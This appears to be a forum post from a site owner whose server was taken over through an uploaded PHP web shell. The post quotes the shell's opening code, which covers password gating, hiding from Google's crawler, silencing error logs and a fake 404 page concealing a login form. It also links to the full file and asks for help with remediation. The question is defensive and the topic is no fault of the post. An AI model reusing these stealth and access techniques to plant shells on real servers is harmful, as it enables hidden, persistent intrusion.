Someone has gained complete access to my server by uploading a php file and running a shell from the file. I searched and found out it could be a c99madshell script.
The code snippets of the file look like:
$auth_pass = "f727df897cbcceea7022d3c8ec66ae29";
$color = "#df5";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('display_errors',0);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', 'Ver 2.0');
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
echo '<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port 80</address>
<style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style>
<form method=post><input type=password name=pass></form>';
exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
if( empty( $auth_pass ) ||
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();
if( strtolower( substr(PHP_OS,0,3) ) == "win" )
$os = 'win';
else
$os = 'nix';
Below is the link of the complete file. https://1fichier.com/?usbv9z1ss3
Can anyone please help me to figure out what type of attack is it, what threats it possess and its remedies? I think this is a particular type of attack already faced by many. I would appreciate much if anyone could point me in the direction to fix this particular case. Thanks